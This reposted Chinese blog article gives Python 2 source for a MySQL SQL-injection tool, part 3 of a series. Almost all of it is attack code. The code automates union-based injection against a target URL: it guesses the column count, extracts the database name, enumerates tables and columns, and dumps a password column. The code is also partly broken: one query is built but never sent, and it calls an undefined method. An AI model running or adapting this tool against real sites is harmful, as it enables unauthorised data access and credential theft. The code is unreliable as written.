碼上歡樂
相關內容    簡體    繁體

Python編寫SQL注入工具(3)

本文轉載自   查看原文   2015-11-21 17:49   3130    Python

Mysql注入模塊

#coding:gb2312
import urllib
import string
import binascii
import re

class mysqlInject():
    def __init__(self,url):
        self.db='database()'
        self.url=url  #待檢測的網址
        self.dblen=0  #數據庫的長度
        self.counts=0 #字段數
        self.tables=[] #
        self.dbname=''

    # 檢測數據庫的版本
    def judgeVersion(self):
        page=urllib.urlopen(self.url).read()
        sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],'')
        pagex=urllib.urlopen(self.url).read()
        if page==pagex:
            print 'MYSQL版本:>5'
        else:
            print 'MYSQL版本<5'

    #檢測字段數
    def columnCounts(self):
        page=urllib.urlopen(self.url).read()
        for n in range(1,100):
            sql=string.join([self.url,"%20order%20by%20",str(n)],'')
            pagex=urllib.urlopen(sql).read()
            if n==1:
                if page==pagex:
                    print '可以使用 order by 猜解'
                else:
                    print '不能使用order by 猜解'
                    break
            else:
                if page!=pagex:
                    self.counts=n-1
                    print '字段數:',self.counts
                    break
        if self.counts==0:
            print '未能猜解出字段數!'

    #爆出當前數據庫名,數據庫用戶
    def inject5Content(self,sql):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=sql
            url+=',0x25)'
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            return strings

    def inject5TableNames(self,DB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+table_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_schema='
        url+=DB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    #猜解字段名
    def inject5ColumnsName(self,TB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+column_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_name='
        url+=TB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    #猜字段內容
    def inject5CountContent(self,TN,CN):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=CN
            url+=',0x25)'
        url+='%20from%20'
        url+=TN
        pagex=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagex)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            print  CN,':',strings

    #如果數據庫的版本大於4,可以使用'查'表的方法注入
    def inject5(self):
        d='database()'
        self.database=self.inject5Content(d)
        print self.database
        database0x=binascii.b2a_hex(self.database)
        database0x='0x'+database0x
        print database0x
        self.inject5TableName(database0x)
        self.inject5TableNames(database0x)
        tb=self.tables[0]
        print ''
        tb=binascii.b2a_hex(tb)
        tb='0x'+tb
        print tb
        self.inject5ColumnsName(tb)
        self.inject5CountContent('gly','password')

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Python編寫SQL注入工具(1) 如何編寫一個SQL注入工具 [初學Python]編寫一個最簡單判斷SQL注入的檢測工具 python編寫SQL自動注入腳本 記一次SQL聯合查詢注入工具的編寫 SQL注入-工具篇 使用C#winform編寫滲透測試工具--SQL注入 基礎篇——SQL注入(工具注入) python的sql注入 sql注入工具:sqlmap命令
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM